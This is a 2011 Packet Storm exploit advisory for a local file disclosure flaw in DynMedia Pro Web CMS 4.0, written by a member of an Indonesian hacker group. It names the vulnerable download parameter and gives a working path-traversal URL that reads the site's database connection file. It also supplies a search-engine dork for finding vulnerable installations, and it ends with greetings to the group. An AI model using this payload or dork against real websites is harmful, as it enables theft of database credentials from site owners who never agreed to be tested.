DynMedia Pro Web CMS 4.0 File Disclosure

2011-04-22T00:00:00
ID PACKETSTORM:100714
Type packetstorm
Reporter Mbah Semar
Modified 2011-04-22T00:00:00

Description

                                        
                                            `|||[!]===========================================================================[!]  
  
[~] DynMedia Pro Web CMS 4.0 ||Local File Disclosure Exploit|  
|[~] Author : Mbah_Semar (fuji@undiphacker.net)  
[~] Homepage : http://www.indonesianhacker.or.id | http://suramcrew.org  
| http://www.masfuji.us  
[~] Date : 22 April, 2010  
  
[!]===========================================================================[!]  
  
[ Software Information ]  
  
[+] Vendor : http://www.vinyadmedia.com  
[+] License : Commercial  
[+] Vulnerability : ||||Local File Disclosure|  
|[+] Dork : "Powered by Vinyad dynMedia�Pro 4.0"  
[+] Version : 4.0  
  
[!]===========================================================================[!]  
  
[ Vulnerable File ]  
http://www.example.com/downloadfile.php?dwnfile=[LFD]  
  
  
  
[ Example ]  
  
http://www.example.com/downloadfile.php?dwnfile=../library/dbconnect.php  
  
  
[!]===========================================================================[!]  
  
[ Thanks TO ]  
  
[+] Indonesian Hacker Team  
[+] Virgi aka Bl4ck_b0x, gisa maho, Lukas Ranger Zero-Line, Aanz, Angga,  
riv182, sudden_death, alusius, and you.  
[+] Semua kaum Suram dimanapun berada yang tidak bisa disebukan satu persatu  
  
  
[ NOTE ]  
  
[+] Tolong kasih saya sesaji berupa Kopi Item dan rokok Gudang Garam  
International  
|  
  
`